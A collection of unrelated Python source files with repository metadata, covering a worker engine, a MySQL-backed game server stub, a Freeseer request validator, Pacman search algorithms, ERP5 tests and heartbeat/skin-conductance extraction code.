self.sendCommand({"command":"buffer", "buffer":datFile})
if (logLine.getValue("SampleType") == "1"):
if (self.needBuffer):
averagedBuffer = self.requestAveragedBuffer()
print "AVERAGED BUFFER"
print averagedBuffer
if (averagedBuffer):
self.sendCommand({"command":"averaged_buffer", "averaged_buffer":averagedBuffer})
self.needBuffer = False
self.sendCommand({"command":"static_image", "static_image":datFile})
else:
self.sendCommand({"command":"static_image", "static_image":datFile})
else:
self.logger.info("So lets average with current buffer!")
else:
self.logger.info("No change in root name fellas")
if (logLine.getValue("SampleType") == "0"):
self.sendCommand({"command":"buffer", "buffer":datFile})
if (logLine.getValue("SampleType") == "1"):
if (self.needBuffer):
averagedBuffer = self.requestAveragedBuffer()
print averagedBuffer
if (averagedBuffer):
self.sendCommand({"command":"averaged_buffer", "averaged_buffer":averagedBuffer})
self.needBuffer = False
self.sendCommand({"command":"static_image", "static_image":datFile})
else:
self.logger.critical("No averaged Buffer returned unable to perform subtraction")
else:
self.sendCommand({"command":"static_image", "static_image":datFile})
except IndexError:
if (self.first):
self.first = False
else:
self.logger.info("INDEX ERROR - Should only occur on first pass!")
def cli(self):
try:
while True:
print "exit - to exit"
print "workers - sends test command out to find workers that are alive"
print "variables - returns all the class variables of each worker"
request = raw_input(">> ")
if (request == "exit"):
self.exit()
if (request == "workers"):
self.test()
if (request == "variables"):
self.sendCommand({"command":"get_variables"})
time.sleep(0.1)
except KeyboardInterrupt:
pass
#Generic Methods
def sendCommand(self, command):
"""
Sends a structed Dictionary command to all connected Workers
Args:
command (Dictionary): requested command to be sent
"""
if (type(command) is dict):
for worker in self.connectedWorkers:
self.connectedWorkers[worker].send_pyobj(command)
else:
self.logger.critical("Incorrect Command datatype, must send a dictionary")
def sendLogLine(self, line):
"""
Sends the pass logline to the WorkerDB to be written out to the database
Args:
line (LogLine object): LogLine object that you want to write to the DB
"""
self.connectedWorkers['WorkerDB'].send_pyobj({"command":"log_line", "line":line})
def createDB(self):
"""
Create the specified database for the new user
"""
self.connectedWorkers['WorkerDB'].send_pyobj({"command":"createDB"})
def requestAveragedBuffer(self):
"""
Request from the WorkerBufferAverage for the current averaged buffer
Returns:
Averaged Buffer List
"""
self.requestBuffer.send("request_buffer")
buffer = self.requestBuffer.recv_pyobj()
return buffer
def test(self):
self.sendCommand({'command':"test"})
time.sleep(0.1)
def exit(self):
"""
Properly shuts down all the workers
"""
self.sendCommand({"command":"shut_down"})
time.sleep(0.1)
sys.exit()
def setLoggingDetails(self):
"""
Current generic logging setup using the python logging module
"""
LOG_FILENAME = 'logs/'+self.name+'.log'
FORMAT = "%(asctime)s - %(levelname)s - %(name)s - %(message)s"
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,format=FORMAT)
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(name)s - %(message)s')
console.setFormatter(formatter)
logging.getLogger(self.name).addHandler(console)
self.logger = logging.getLogger(self.name)
self.logger.info("\nLOGGING STARTED")
if __name__ == "__main__":
eng = Engine("settings.conf")
eng.run()
|
UTF-8
|
Python
| false | false | 2,012 |
14,061,722,960,705 |
1f57d801e1dc4b581fe0d9c8a3085a6a4b133bab
|
c647d3681fb3035409935882027e87899c072826
|
/src/carmcmc/__init__.py
|
9830e70fa28156beaf5d563ce2b8dc6e94efaacb
|
[
"MIT"
] |
permissive
|
anetasie/carma_pack
|
https://github.com/anetasie/carma_pack
|
c2a1a188707200a5efd7b2e23514f8cb063d9866
|
7fae9e69844faee9a719e3d95f301ee88d239b9c
|
refs/heads/master
| 2021-01-18T07:48:52.085678 | 2013-09-17T02:07:47 | 2013-09-17T02:07:47 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from _carmcmc import *
from carma_pack import CarmaMCMC, CarmaSample, CarSample1, power_spectrum, carma_variance, \
carma_process, get_ar_roots
from samplers import MCMCSample
|
UTF-8
|
Python
| false | false | 2,013 |
2,791,728,790,208 |
3edfc9b40298e36b56154d4a49bd6c538a672e35
|
aedc91275999871b157191f4fad92ebe85debdb9
|
/heuristica_complex/trabalho1/ex_25.py
|
cabcf84ac2f7c9f74f1dd923f7bb4f54284feebf
|
[] |
no_license
|
hugomaiavieira/trabalhos_uenf
|
https://github.com/hugomaiavieira/trabalhos_uenf
|
0f419b773fc84710eba55d5242a0803b604abb6c
|
1af4c1bea374cf5da7412f99cb1e517bd59fde7d
|
refs/heads/master
| 2020-05-20T10:58:39.801734 | 2011-05-23T20:54:18 | 2011-05-23T20:54:21 | 605,749 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def horner_bitwise(lista, k):
resultado = 0
for i in range(0, len(lista)):
ki = multiplicar(k, i)
resultado += multiplicar(dois_elevado_a(ki), lista[i])
return resultado
def multiplicar(num1, num2):
resultado = 0
maior, menor = (num1, num2) if num1 >= num2 else (num2, num1)
for i in range(menor):
resultado += maior
return resultado
def dois_elevado_a(n):
return 1 << n
|
UTF-8
|
Python
| false | false | 2,011 |
18,949,395,721,578 |
53d18d027751e3ef650aa929b6a1b7f94f5b9610
|
342fff5dfbf09521d64e69a0720590585b400d0e
|
/AoC/Faolan/trunk/tools/pyAoCServ/src/UniverseServer.py
|
898b8ec1775b45604bfdc34a239f58f7c5763561
|
[
"GPL-2.0-only"
] |
non_permissive
|
vipuldivyanshu92/Projects
|
https://github.com/vipuldivyanshu92/Projects
|
071d4223b96f310042475afce0ada0c5f4885996
|
b39abbee89405e466534191c422a2e01bb220012
|
refs/heads/master
| 2021-01-10T01:26:10.036872 | 2011-07-02T10:42:17 | 2011-07-02T10:42:17 | 8,507,984 | 2 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from common import framework
from universe import onInitiateAuthentification, onAnswerChallenge
import asyncore
import MySQLdb
class UniverseServer(framework.server):
def __init__(self):
framework.server.__init__(self, 7000, 20, framework.GlobalHandler, False)
self.db = MySQLdb.connection(
host = "127.0.0.1",
user = "root",
passwd = "",
db = "aoc",
)
self.packetMgr = {
"UniverseAgent" : {
0 : onInitiateAuthentification.onInitiateAuthentification,
1 : onAnswerChallenge.onAnswerChallenge,
}
}
serv = UniverseServer()
asyncore.loop()
|
UTF-8
|
Python
| false | false | 2,011 |
16,286,515,991,567 |
99dbf5b998d1b18b1cf581babc5de34b3ab9bcb0
|
802a0d67741397ac1bef4965caff402e23bbf879
|
/src/freeseer/frontend/controller/validate.py
|
3a6e0c72299357159a98928c458f2a6b4b853096
|
[
"GPL-3.0-only"
] |
non_permissive
|
benbuckley/freeseer
|
https://github.com/benbuckley/freeseer
|
16aa6a6e02987dc77e4e58b07eff5d339ce60f43
|
2a74681b45186244f1a6bc3df730346b9e4f05a5
|
refs/heads/master
| 2021-01-18T08:25:42.855410 | 2014-11-25T03:51:40 | 2014-11-25T04:02:52 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# freeseer - vga/presentation capture software
#
# Copyright (C) 2014 Free and Open Source Software Learning Centre
# http://fosslc.org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# For support, questions, suggestions or any other inquiries, visit:
# http://wiki.github.com/Freeseer/freeseer/
from jsonschema import validate
from jsonschema import ValidationError
def validate_control_recording_request_form(to_validate):
result = True
schema = {
"type": "object",
"properties": {
"command": {
"enum": ["start", "pause", "stop"]
}
},
"required": ["command"]
}
try:
validate(to_validate, schema)
except ValidationError:
result = False
return result
def validate_create_recording_request_form(to_validate):
result = True
schema = {
"type": "object",
"properties": {
"filename": {
"type": "string",
"pattern": "^\w+$"
}
},
"required": ["filename"]
}
try:
validate(to_validate, schema)
if to_validate["filename"] == "":
result = False
except ValidationError:
result = False
return result
|
UTF-8
|
Python
| false | false | 2,014 |
309,237,692,698 |
14827b1cfd92d9a91b16e99952c56417e8bd0b0a
|
3df34ab0111112abcc10ae244079874c9b5b47d7
|
/darking.py
|
89ec7b677319a5bd3ab8941ea49fb729c780e061
|
[] |
no_license
|
antiface/Harvest
|
https://github.com/antiface/Harvest
|
878210c0badabc06dcc7091fa479db936eded178
|
a6994555be0805a6fa8e68d49b19793ab25fdf21
|
refs/heads/master
| 2020-12-28T19:07:51.896469 | 2014-04-22T21:48:18 | 2014-04-22T21:48:18 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import pygame,random, physics, harvest_screen, math
from harvest_screen import *
class blobPoint(object):
def __init__(self,x,y):
# add itself to the Things-with-mass list?
#get black pixel image and its 1x1 rectangle
self.image = pygame.image.load("images/blackPixel.bmp")
self.rect = self.image.get_rect().inflate(3,3)
self.position = physics.vector2d(x,y)
self.velocity = physics.vector2d(0,0) #x,y velocities (pixels per tick)
#self.acceleration = physics.vector2d(0,0) # x,y accelerations
self.temperature = 20 # maybe irrelevant? maybe super important?
self.controlpt = False
def bump(self,ptList):
i = self.rect.collidelist(ptList)
ptList[i].velocity,self.velocity = self.velocity.multiply(.6),ptList[i].velocity.multiply(.6)
def accelerate(self):
# In this world there are very few forces: here we check and apply them all to this blobPoint
# accelerate for particle attraction
physics.applyForce(self,physics.Gravity)
# accelerate for solid?/liquid/air resistance
#if not self.controlpt:
# dragVect = self.velocity.multiply(-.2)
self.velocity = self.velocity.multiply(.95)
if self.velocity.x + self.velocity.y > 150:
self.velocity = physics.vector2d(10,10)
#accelerate for other forces?
def update(self):
if self.position.x > width:
self.position.x = width -1
self.velocity = self.velocity.reverse()
if self.position.x < 0:
self.position.x = 1
self.velocity = self.velocity.reverse()
if self.position.y > height:
self.position.y = height-1
self.velocity = self.velocity.reverse()
if self.position.y < 0:
self.position.y = 1
self.velocity = self.velocity.reverse()
self.velocity = self.velocity.multiply(.65)
self.position = self.position.add(self.velocity)
self.accelerate()
def blit(self):
self.rect.center = self.position.coords
screen.blit(self.image,self.rect)
class controlPoint(blobPoint):
def __init__(self,x,y):
blobPoint.__init__(self,x,y)
#DO THIS GODDAM THING!!!!
def accelerate(self):
for point in self.parts:
dist = math.sqrt(math.pow(self.position.x-point.position.x,2)+math.pow(self.position.y-point.position.y,2))
vect = physics.vector2d(self.position.x-point.position.x,self.position.y-point.position.y).unitize()
vect = vect.multiply(350)
vect = vect.divide(math.pow(dist,1.5))
physics.applyForce(point,vect)
if self.rect.colliderect(point.rect):
self.velocity = physics.vector2d(0,0)
point.velocity = physics.vector2d(0,0)
if dist <= 50 and point.controlpt:
#point.velocity = point.velocity.reverse()
point.velocity = physics.vector2d(0,0)
vect = vect.reverse()
#physics.applyForce(point,vect)
if dist <= 50 and not point.controlpt:
point.velocity = point.velocity.multiply(.5)
if dist >= 200 and not point.controlpt:
a = random.randint(-70,70)
b = random.randint(-70,70)
if abs(a) > 30:
a = random.randint(-70,70)
if abs(b) > 30:
b = random.randint(-70,70)
point.position = self.position.add(physics.vector2d(a,b))
# accelerate for gravity
|
UTF-8
|
Python
| false | false | 2,014 |
14,431,090,154,004 |
f2c2c14654450ef13db403c9b8121b503ca9096b
|
92b937cbc0b224852f3f31e99e2ff3f27b8f1fe7
|
/search.py
|
fb9bc630848d1dce2c6c82db85dfcc551765a267
|
[] |
no_license
|
yoavkt/AI_ex1
|
https://github.com/yoavkt/AI_ex1
|
fbf6a1875886b62a82b1dac9fb4e935e68b92e67
|
5de1aeb186cc127f4b7d2d774cf4c14015886679
|
refs/heads/master
| 2020-06-04T10:53:30.401260 | 2013-11-02T13:34:30 | 2013-11-02T13:34:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# search.py
# ---------
# Licensing Information: Please do not distribute or publish solutions to this
# project. You are free to use and extend these projects for educational
# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by
# John DeNero ([email protected]) and Dan Klein ([email protected]).
# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html
"""
In search.py, you will implement generic search algorithms which are called
by Pacman agents (in searchAgents.py).
"""
import util
from game import Directions
class SearchProblem:
"""
This class outlines the structure of a search problem, but doesn't implement
any of the methods (in object-oriented terminology: an abstract class).
You do not need to change anything in this class, ever.
"""
def getStartState(self):
"""
Returns the start state for the search problem
"""
util.raiseNotDefined()
def isGoalState(self, state):
"""
state: Search state
Returns True if and only if the state is a valid goal state
"""
util.raiseNotDefined()
def getSuccessors(self, state):
"""
state: Search state
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
util.raiseNotDefined()
def getCostOfActions(self, actions):
"""
actions: A list of actions to take
This method returns the total cost of a particular sequence of actions. The sequence must
be composed of legal moves
"""
util.raiseNotDefined()
def tinyMazeSearch(problem):
"""
Returns a sequence of moves that solves tinyMaze. For any other
maze, the sequence of moves will be incorrect, so only use this for tinyMaze
"""
from game import Directions
s = Directions.SOUTH
w = Directions.WEST
return [s,s,w,s,w,w,s,w]
def FirstSearchHelper(problem, fringe):
"""
Generic helper function for BFS and DFS
"""
# fringe: either Queue or Stack
# nodes in fringe will be (state, parent, direction)
# closed: dictionary {state: node tuple}
# path: list of util.Directions
closed = {}
path = []
root = problem.getStartState()
fringe.push((root,None,Directions.STOP))
while not fringe.isEmpty():
node = fringe.pop()
state = node[0]
if problem.isGoalState(state):
while node[2] != Directions.STOP:
path.append(node[2])
node = closed[node[1]] # Get parent node
path.reverse()
return path
if not state in closed:
closed[state] = node
children = problem.getSuccessors(state)
for child in children:
if not closed.has_key(child[0]):
#print 'Pushing ' +str((child[0], state, child[1]))#DEBUG
fringe.push((child[0], state, child[1]))
return None
def depthFirstSearch(problem):
fringe = util.Stack()
return FirstSearchHelper(problem, fringe)
def breadthFirstSearch(problem):
fringe = util.Queue()
return FirstSearchHelper(problem, fringe)
def uniformCostSearch(problem):
#fringe = util.PriorityQueueWithFunction(lambda state_cost_pair : state_cost_pair[1])
#return graphSearch(problem, fringe)
return aStarSearch(problem)
def nullHeuristic(state, problem=None):
"""
A heuristic function estimates the cost from the current state to the nearest
goal in the provided SearchProblem. This heuristic is trivial.
"""
return 0
def aStarSearch(problem, heuristic=nullHeuristic):
# Almost identical to FirstSearchHelper but making this really generic
# would have made the code really cumbersome
#
# fringe: util.PriorityQueue() with priority f(n)=g(n)+h(n)
# nodes in fringe will be (state, parent, direction)
# closed: dictionary {state: node tuple}
# path: list of util.Directions
# f,c,h: dictionaries for cost functions
closed = {}
fringe = util.PriorityQueue()
path = []
c = {}
h = {}
f = {}
root = problem.getStartState()
c[root] = 0
h[root] = heuristic(root, problem)
f[root] = c[root]+h[root]
fringe.push((root, None, 'Stop'), f[root])
while not fringe.isEmpty():
node = fringe.pop()
state = node[0]
if problem.isGoalState(state):
while node[2] != 'Stop':
path.append(node[2])
node = closed[node[1]]
path.reverse()
return path
closed[state] = node
children = problem.getSuccessors(state)
childNode = None
for child in children:
if child[0] not in closed:
c_child = c[state] + child[2]
if not h.has_key(child[0]):
h[child[0]] = heuristic(child[0], problem)
if (not c.has_key(child[0])) or (c_child < c[child[0]]):
# node never checked or current path is better
c[child[0]] = c_child
f[child[0]] = c[child[0]] + h[child[0]]
childNode = (child[0], state, child[1])
fringe.push(childNode, f[child[0]])
return None
# Abbreviations
bfs = breadthFirstSearch
dfs = depthFirstSearch
astar = aStarSearch
ucs = uniformCostSearch
|
UTF-8
|
Python
| false | false | 2,013 |
17,480,516,903,731 |
4aa9f40e03eda62bd8108f7a5554d7e263117f9a
|
c7376d7bdf93ded430a9095ae2a10c92a400db95
|
/master/product/Vifib/tests/testVifibSlapSoftwareReleaseAvailable.py
|
bab27d12814f77f327135cac8b7317eea460f5c4
|
[] |
no_license
|
shadowchmod/slapos.core
|
https://github.com/shadowchmod/slapos.core
|
7fc550a9d443f8e9603ef61bfa59f7d52a10317f
|
947508d45aa371590bee20625ebdd6af6b9f17f5
|
refs/heads/master
| 2021-01-21T01:05:45.317738 | 2012-08-17T15:26:28 | 2012-08-17T15:26:28 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from Products.ERP5Type.tests.Sequence import SequenceList
import unittest
from testVifibSlapWebService import TestVifibSlapWebServiceMixin
class TestVifibSlapSoftwareReleaseAvailable(TestVifibSlapWebServiceMixin):
########################################
# SoftwareRelease.available
########################################
def test_SoftwareRelease_available_afterRegister(self):
"""
Check that calling SoftwareRelease.available after just registration raises a
NotFoundError
"""
sequence_list = SequenceList()
sequence_string = self.prepare_formated_computer + '\
SlapLoginCurrentComputer \
SelectNewSoftwareReleaseUri \
CheckNotFoundSoftwareReleaseAvailableAfterRegisterCall \
SlapLogout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_SetupResource_ConfirmedState(self):
"""
Check that calling SoftwareRelease.available works in
confirmed state with the setup resource
"""
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_purchase_packing_list + '\
SlapLoginCurrentComputer \
CheckSuccessSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckStoppedPurchasePackingList \
CheckSoftwareReleaseAvailableForRequest \
Logout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_Computer_available_SetupResource_ConfirmedState_CleanupResource_ConfirmedState(self):
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_purchase_packing_list + '\
LoginDefaultUser \
SetCurrentPurchasePackingListAsA \
Logout \
SlapLoginCurrentComputer \
CheckSuccessComputerGetSoftwareReleaseListCall \
SlapLogout ' + self.prepare_software_release_cleanup_confirmed_packing_list + '\
LoginDefaultUser \
SetCurrentPurchasePackingListAsB \
Logout \
SlapLoginCurrentComputer \
CheckSuccessComputerGetSoftwareReleaseListCall \
CheckDestroyedStateGetSoftwareReleaseListCall \
CheckSuccessSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckSoftwareReleaseAvailableForRequest \
CheckStoppedPurchasePackingListA \
CheckConfirmedPurchasePackingListB \
Logout \
SlapLoginCurrentComputer \
CheckSuccessComputerGetSoftwareReleaseListCall \
CheckDestroyedStateGetSoftwareReleaseListCall \
CheckSuccessSoftwareReleaseDestroyedCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckDeliveredPurchasePackingListA \
CheckDeliveredPurchasePackingListB \
CheckSoftwareReleaseUnavailableForRequest \
Logout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_CleanupResource_ConfirmedState(self):
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_SetupResource_CancelledState(self):
"""
Check that calling SoftwareRelease.available works in
cancelled state with the setup resource
"""
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_purchase_packing_list + '\
LoginDefaultUser \
CancelPurchasePackingList \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckSoftwareReleaseUnavailableForRequest \
CheckCancelledPurchasePackingList \
Logout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_CleanupResource_CancelledState(self):
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
LoginDefaultUser \
CancelPurchasePackingList \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_SetupResource_StartedState(self):
"""
Check that calling SoftwareRelease.available works in
started state with the setup resource
"""
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_purchase_packing_list + '\
LoginDefaultUser \
StartPurchasePackingList \
Tic \
CheckSoftwareReleaseUnavailableForRequest \
Logout \
SlapLoginCurrentComputer \
CheckSuccessSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckStoppedPurchasePackingList \
CheckSoftwareReleaseAvailableForRequest \
CheckSoftwareReleaseInPublicTable \
Logout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_CleanupResource_StartedState(self):
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
LoginDefaultUser \
StartPurchasePackingList \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_SetupResource_StoppedState(self):
"""
Check that calling SoftwareRelease.available works in
stopped state with the setup resource
"""
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_purchase_packing_list + '\
LoginDefaultUser \
StartPurchasePackingList \
StopPurchasePackingList \
Tic \
CheckSoftwareReleaseAvailableForRequest \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckStoppedPurchasePackingList \
CheckSoftwareReleaseAvailableForRequest \
Logout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_CleanupResource_StoppedState(self):
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
LoginDefaultUser \
StartPurchasePackingList \
Tic \
StopPurchasePackingList \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_SetupResource_DeliveredState(self):
"""
Check that calling SoftwareRelease.available works in
delivered state with the setup resource
"""
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_purchase_packing_list + '\
LoginDefaultUser \
StartPurchasePackingList \
StopPurchasePackingList \
DeliverPurchasePackingList \
Tic \
CheckSoftwareReleaseUnavailableForRequest \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckDeliveredPurchasePackingList \
CheckSoftwareReleaseUnavailableForRequest \
Logout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_CleanupResource_DeliveredState(self):
sequence_list = SequenceList()
sequence_string = self.prepare_software_release_cleanup_purchase_packing_list + '\
LoginDefaultUser \
StartPurchasePackingList \
Tic \
StopPurchasePackingList \
Tic \
DeliverPurchasePackingList \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckNotFoundSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_SoftwareRelease_available_twoPurchasePackingList(self):
"""
Check that calling SoftwareRelease.available uses the latest purchase packing
list for calculation
"""
sequence_list = SequenceList()
sequence_string = self.prepare_two_purchase_packing_list + '\
LoginDefaultUser \
StepPurchasePackingListBStartDateAfterPurchasePackingListA \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckSuccessSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckStoppedPurchasePackingListB \
Logout\
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_string = self.prepare_two_purchase_packing_list + '\
LoginDefaultUser \
StepPurchasePackingListBStartDateBeforePurchasePackingListA \
Tic \
Logout \
SlapLoginCurrentComputer \
CheckSuccessSoftwareReleaseAvailableCall \
Tic \
SlapLogout \
LoginDefaultUser \
CheckStoppedPurchasePackingListB \
Logout\
LoginERP5TypeTestCase \
CheckSiteConsistency \
Logout \
'
sequence_list.addSequenceString(sequence_string)
sequence_list.play(self)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestVifibSlapSoftwareReleaseAvailable))
return suite
|
UTF-8
|
Python
| false | false | 2,012 |
14,302,241,132,421 |
ba5e8db85ae6b7dbc64d5f75009bccb175e112e3
|
65c4b7eae31f0f7f1d114f327c7d8abd395968b3
|
/eelbrain/psyphys/datasets_op_physio.py
|
7ee17194dacde08dd0a1978de36987ad8cb9afde
|
[] |
no_license
|
teonbrooks/Eelbrain
|
https://github.com/teonbrooks/Eelbrain
|
191bca0d5310a0b4b0ef7cd1ff5a4841578253f5
|
49019cd2e2e188c0f190477ea2f9054ade7b9cf9
|
refs/heads/master
| 2017-12-02T02:11:40.197285 | 2013-03-04T21:05:18 | 2013-03-05T16:23:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""
op.physio
=========
Operations for psychophysiology: heartbeat- and skin conductance response (SCR)
extraction.
"""
import logging
import numpy as np
import scipy as sp
from matplotlib import mlab
from matplotlib import pyplot as P
from datasets_base import Derived_Event_Dataset
import datasets_mixins as mixins
import param
class HeartBeat(Derived_Event_Dataset, mixins.Reject):
def _addparams_(self, p):
p.minIBI = param.Param(default=.1, desc="minimum IBI (in sec)")
p.maxIBI = param.Param(default=1.5, desc="maximum IBI (in sec)")
p.threshold = param.Param(default=95, desc="Threshold for beat "
"detection (only applies if advanced==alse)")
p.advanced = param.Param(default=True, dtype=bool,
desc=" include minIBI etc. in calc")
def _validate_input_properties_(self, properties):
if properties['ndim'] != 1:
raise ValueError("ibi needs ndim=1 input")
else:
return True
def _create_varlist_(self):
e = self.experiment
varlist = [e.variables.get('time'),
e.variables.get('IBI'),
e.variables.get('Rate')]
return varlist
def _derive_segment_data_(self, segment, preview=False):
source = segment._p_attr['source']
samplingrate = self.properties['samplingrate']
# for name in ['threshold', 'minIBI', 'maxIBI', 'advanced']:
# locals()[name] = self.compiled[name]
threshold = self.compiled['threshold']
minIBI = self.compiled['minIBI']
maxIBI = self.compiled['maxIBI']
advanced = self.compiled['advanced']
t = source.t
# prepare data
f0 = source.data[:,0]
if True:#pretreatment == 1:
f0 = np.hstack([[0], np.abs(np.diff(f0, n=2)), [0]])
f0 = self.reject_flatten(segment, f0, t)
threshold = sp.stats.scoreatpercentile(f0, threshold)
## beat extraction
beats = [] # [t, IBI]
f0_len = len(f0)
if advanced:
# in samples:
minstep = int(minIBI * samplingrate)
window = int(maxIBI * samplingrate)
last = -minstep
while last < f0_len - (minstep + window):
# get window for possible new beats
start = last + minstep
end = start + window
dtemp = f0[start:end]
# max inside window
new = np.argmax(dtemp)
if threshold:
# if minstep and threshold allow insert beat
while new > minstep:
# test: use percentil
# if np.max(dtemp[0:new-minstep]) > np.max(dtemp) * threshold:
if np.max(dtemp[0:new-minstep]) > threshold:
new = np.argmax(dtemp[0:new-minstep])
else:
break
next = last + minstep + new
# beats.append([t[next], t[next]-t[last]])
beats.append(t[next])
last = next
beats = np.array(beats)
# interpolate at places where exclusion is too long
reject_list = self.reject_list_for_segment(segment)
logging.debug("REJECT: %s"%reject_list)
for t1, t2 in reject_list:
if t2-t1 > minIBI:
# wrong = (beats > t1) * (beats < t2)
# if np.any(wrong):
# wrong = np.nonzero(wrong)[0]
# beats = np.hstack(beats[:wrong[0]], beats[wrong[-1]+1:])
# find time difference
# remove beats inside rejection area
i1 = np.sum(beats < t1) - 1 # the last sample before t1
i2 = np.sum(beats < t2) # the first sample after t2
ibi = beats[i2] - beats[i1]
ibi1 = beats[i1] - beats[i1-1]
ibi2 = beats[i2+1] - beats[i2]
ibi_mean = np.mean([ibi1, ibi2])
logging.debug("t=%s, ibi=%s, mean-ibi=%s"%(t1, ibi, ibi_mean))
if ibi > 1.5 * ibi_mean:
n = round(ibi / ibi_mean)
ibi_new = ibi / n
beats = np.hstack([beats[:i1+1],
[(beats[i1] + i*ibi_new) for i in range(1, n)],
beats[i2:]])
elif i2 != i1 + 1:
beats = np.hstack([beats[:i1+1], beats[i2:]])
i2 = i1+1
# calculate ibi
ibi = beats[1:] - beats[:-1]
# correct the first beat's ibi
ibi = np.hstack([[ibi[0]], ibi])
# derive Rate from IBI
rate = 60 / ibi
beats = np.hstack([beats[:,None], ibi[:,None], rate[:,None]])
else:
raise NotImplementedError
# threshold = data_in.max() * threshold
# last = - minIBI
# for i in arange(data_in.shape[0]):
# if data_in[i] > threshold and i > last + minIBI:
# beats.append(i)
# last = i
return beats
class SCR(Derived_Event_Dataset, mixins.Reject):
def _addparams_(self, p):
p.smooth1 = param.Window(default=(4, 150), #del_segs=True,
desc="Smoothing before taking "
"the first derivative")
p.smooth2 = param.Window(default=(0, 150), #del_segs=True,
desc="Smoothing of the first derivative "
